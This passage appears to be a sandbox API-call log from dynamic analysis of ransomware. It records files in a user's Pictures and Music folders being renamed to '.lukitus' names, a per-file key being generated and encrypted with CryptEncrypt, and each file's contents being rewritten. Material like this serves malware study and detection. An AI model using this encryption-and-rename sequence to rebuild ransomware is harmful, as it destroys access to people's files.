lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x5dbf, lpOverlapped=0x0) returned 1 [0108.263] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.263] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x5dbf, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x5dbf, lpOverlapped=0x0) returned 1 [0108.263] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.263] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x648e77d0, dwHighDateTime=0x1d31760)) [0108.263] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.263] FlushFileBuffers (hFile=0x328) returned 1 [0108.268] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Pictures\\0_64JkgHfEkBiBb6l.gif" (normalized: "c:\\users\\aetadzjz\\pictures\\0_64jkghfekbibb6l.gif"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b4b38f0, ftCreationTime.dwHighDateTime=0x1d2f96e, ftLastAccessTime.dwLowDateTime=0x53f6b0, ftLastAccessTime.dwHighDateTime=0x1d2f5a4, ftLastWriteTime.dwLowDateTime=0x53f6b0, ftLastWriteTime.dwHighDateTime=0x1d2f5a4, nFileSizeHigh=0x0, nFileSizeLow=0x12d35)) returned 1 [0108.268] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.268] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.268] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.268] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.268] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.268] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.268] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.268] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.268] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.268] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.268] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.268] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.268] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.268] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.268] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.268] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.268] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.268] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.268] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.268] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.268] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.268] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.269] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Pictures\\0_64JkgHfEkBiBb6l.gif" (normalized: "c:\\users\\aetadzjz\\pictures\\0_64jkghfekbibb6l.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.269] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Pictures\\0_64JkgHfEkBiBb6l.gif" (normalized: "c:\\users\\aetadzjz\\pictures\\0_64jkghfekbibb6l.gif"), lpNewFileName="c:\\Users\\aETAdzjz\\Pictures\\F56924BE-9663-41BB-0A72E3E6-09C6BD33AE22.lukitus" (normalized: "c:\\users\\aetadzjz\\pictures\\f56924be-9663-41bb-0a72e3e6-09c6bd33ae22.lukitus"), dwFlags=0x9) returned 1 [0108.270] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.270] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.275] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x12d35, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x12d35, lpOverlapped=0x0) returned 1 [0108.275] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.276] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x12d35, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x12d35, lpOverlapped=0x0) returned 1 [0108.276] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.276] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x6490d930, dwHighDateTime=0x1d31760)) [0108.276] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.276] FlushFileBuffers (hFile=0x328) returned 1 [0108.279] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Pictures\\WB2Drlh.bmp" (normalized: "c:\\users\\aetadzjz\\pictures\\wb2drlh.bmp"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xacc40d20, ftCreationTime.dwHighDateTime=0x1d2f899, ftLastAccessTime.dwLowDateTime=0xb4916be0, ftLastAccessTime.dwHighDateTime=0x1d2facb, ftLastWriteTime.dwLowDateTime=0xb4916be0, ftLastWriteTime.dwHighDateTime=0x1d2facb, nFileSizeHigh=0x0, nFileSizeLow=0xae0)) returned 1 [0108.279] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.279] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.279] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.279] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.279] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.279] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.279] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.279] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.279] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.279] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.279] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.279] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.279] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.279] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.279] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.279] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.279] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.279] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.279] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.279] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.279] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.280] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Pictures\\WB2Drlh.bmp" (normalized: "c:\\users\\aetadzjz\\pictures\\wb2drlh.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.280] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Pictures\\WB2Drlh.bmp" (normalized: "c:\\users\\aetadzjz\\pictures\\wb2drlh.bmp"), lpNewFileName="c:\\Users\\aETAdzjz\\Pictures\\F56924BE-9663-41BB-0F2DB1B7-ADEA5382834B.lukitus" (normalized: "c:\\users\\aetadzjz\\pictures\\f56924be-9663-41bb-0f2db1b7-adea5382834b.lukitus"), dwFlags=0x9) returned 1 [0108.281] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.281] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.286] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xae0, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xae0, lpOverlapped=0x0) returned 1 [0108.286] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.286] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xae0, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xae0, lpOverlapped=0x0) returned 1 [0108.286] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.287] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x6490d930, dwHighDateTime=0x1d31760)) [0108.287] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.287] FlushFileBuffers (hFile=0x328) returned 1 [0108.290] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\C-DDFnNneMnC3LawF.wav" (normalized: "c:\\users\\aetadzjz\\music\\c-ddfnnnemnc3lawf.wav"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf35fc3a0, ftCreationTime.dwHighDateTime=0x1d2f78b, ftLastAccessTime.dwLowDateTime=0x95650a70, ftLastAccessTime.dwHighDateTime=0x1d2fead, ftLastWriteTime.dwLowDateTime=0x95650a70, ftLastWriteTime.dwHighDateTime=0x1d2fead, nFileSizeHigh=0x0, nFileSizeLow=0xf18b)) returned 1 [0108.290] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.290] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.290] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.290] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.290] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.290] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.290] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.290] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.290] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.290] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.290] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.290] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.290] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.290] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.290] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.290] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.290] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.290] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.290] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.290] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.290] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Music\\C-DDFnNneMnC3LawF.wav" (normalized: "c:\\users\\aetadzjz\\music\\c-ddfnnnemnc3lawf.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.290] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Music\\C-DDFnNneMnC3LawF.wav" (normalized: "c:\\users\\aetadzjz\\music\\c-ddfnnnemnc3lawf.wav"), lpNewFileName="c:\\Users\\aETAdzjz\\Music\\F56924BE-9663-41BB-97BFBCF8-B516116E07DA.lukitus" (normalized: "c:\\users\\aetadzjz\\music\\f56924be-9663-41bb-97bfbcf8-b516116e07da.lukitus"), dwFlags=0x9) returned 1 [0108.292] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.292] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.297] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xf18b, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xf18b, lpOverlapped=0x0) returned 1 [0108.298] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.298] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xf18b, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xf18b, lpOverlapped=0x0) returned 1 [0108.298] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.298] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64933a90, dwHighDateTime=0x1d31760)) [0108.298] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.299] FlushFileBuffers (hFile=0x328) returned 1 [0108.302] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\dOHwDq.wav" (normalized: "c:\\users\\aetadzjz\\music\\dohwdq.wav"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4168910, ftCreationTime.dwHighDateTime=0x1d2fd34, ftLastAccessTime.dwLowDateTime=0x85deabd0, ftLastAccessTime.dwHighDateTime=0x1d3013a, ftLastWriteTime.dwLowDateTime=0x85deabd0, ftLastWriteTime.dwHighDateTime=0x1d3013a, nFileSizeHigh=0x0, nFileSizeLow=0x10116)) returned 1 [0108.302] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.302] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.302] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.302] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.302] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.302] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.302] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.302] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.302] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.302] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.302] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.302] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.302] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.302] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.302] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.302] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.302] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.302] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.302] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.302] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.302] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Music\\dOHwDq.wav" (normalized: "c:\\users\\aetadzjz\\music\\dohwdq.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.302] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Music\\dOHwDq.wav" (normalized: "c:\\users\\aetadzjz\\music\\dohwdq.wav"), lpNewFileName="c:\\Users\\aETAdzjz\\Music\\F56924BE-9663-41BB-9D05EF54-2DBBB8A0A892.lukitus" (normalized: "c:\\users\\aetadzjz\\music\\f56924be-9663-41bb-9d05ef54-2dbbb8a0a892.lukitus"), dwFlags=0x9) returned 1 [0108.304] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.304] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.309] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x10116, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x10116, lpOverlapped=0x0) returned 1 [0108.309] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.309] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x10116, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x10116, lpOverlapped=0x0) returned 1 [0108.310] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.310] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64959bf0, dwHighDateTime=0x1d31760)) [0108.310] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.310] FlushFileBuffers (hFile=0x328) returned 1 [0108.313] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\F8hMF6kNB.m4a" (normalized: "c:\\users\\aetadzjz\\music\\f8hmf6knb.m4a"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x898602c0, ftCreationTime.dwHighDateTime=0x1d2fee6, ftLastAccessTime.dwLowDateTime=0x17b89f20, ftLastAccessTime.dwHighDateTime=0x1d3002d, ftLastWriteTime.dwLowDateTime=0x17b89f20, ftLastWriteTime.dwHighDateTime=0x1d3002d, nFileSizeHigh=0x0, nFileSizeLow=0xf4da)) returned 1 [0108.313] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.313] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.313] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.313] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.313] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.313] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.313] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, 